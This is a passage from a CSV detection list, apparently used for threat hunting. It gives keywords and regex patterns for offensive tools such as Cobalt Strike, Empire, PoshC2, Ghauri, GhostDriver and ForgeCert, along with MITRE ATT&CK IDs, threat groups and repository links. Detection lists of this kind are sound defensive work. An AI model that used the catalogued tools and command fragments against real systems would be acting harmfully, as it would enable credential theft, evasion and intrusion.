T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmiregcachedrdpconnection*",".{0,1000}get\-wmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*getwmireglastloggedon*",".{0,1000}getwmireglastloggedon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmireglastloggedon*",".{0,1000}get\-wmireglastloggedon.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-wmiregmounteddrive*",".{0,1000}get\-wmiregmounteddrive.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-WorkingHours*",".{0,1000}Get\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gexplorer.exe*",".{0,1000}gexplorer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*ghauri currently only supports DBMS fingerprint payloads for Microsoft Access*",".{0,1000}ghauri\scurrently\sonly\ssupports\sDBMS\sfingerprint\spayloads\sfor\sMicrosoft\sAccess.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Ghauri detected connection errors multiple times*",".{0,1000}Ghauri\sdetected\sconnection\serrors\smultiple\stimes.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Ghauri is expecting database name to enumerate table(s) entries*",".{0,1000}Ghauri\sis\sexpecting\sdatabase\sname\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri -u *",".{0,1000}ghauri\s\-u\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri-*\ghauri-*",".{0,1000}ghauri\-.{0,1000}\\ghauri\-.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.config*",".{0,1000}ghauri\.common\.config.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.lib*",".{0,1000}ghauri\.common\.lib.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.payloads*",".{0,1000}ghauri\.common\.payloads.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.session*",".{0,1000}ghauri\.common\.session.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.common.utils*",".{0,1000}ghauri\.common\.utils.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.core.extract*",".{0,1000}ghauri\.core\.extract.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.core.tests*",".{0,1000}ghauri\.core\.tests.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.extractor.advance*",".{0,1000}ghauri\.extractor\.advance.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri.py *",".{0,1000}ghauri\.py\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri_extractor*",".{0,1000}ghauri_extractor.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghauri-main.zip*",".{0,1000}ghauri\-main\.zip.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ghost_* -v*",".{0,1000}ghost_.{0,1000}\s\-v.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_sparc*",".{0,1000}ghost_sparc.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost_x86*",".{0,1000}ghost_x86.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ghost01.hwtxt*",".{0,1000}ghost01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*GhostDriver.exe *",".{0,1000}GhostDriver\.exe\s.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*GhostDriver-main.zip*",".{0,1000}GhostDriver\-main\.zip.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*GhostInTheNet off*",".{0,1000}GhostInTheNet\soff.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet on*",".{0,1000}GhostInTheNet\son.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet.sh *",".{0,1000}GhostInTheNet\.sh\s.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostMapper-main.*",".{0,1000}GhostMapper\-main\..{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*GhostPack*",".{0,1000}GhostPack.{0,1000}","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*GhostPack/ForgeCert*",".{0,1000}GhostPack\/ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*GhostPack/Koh*",".{0,1000}GhostPack\/Koh.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" 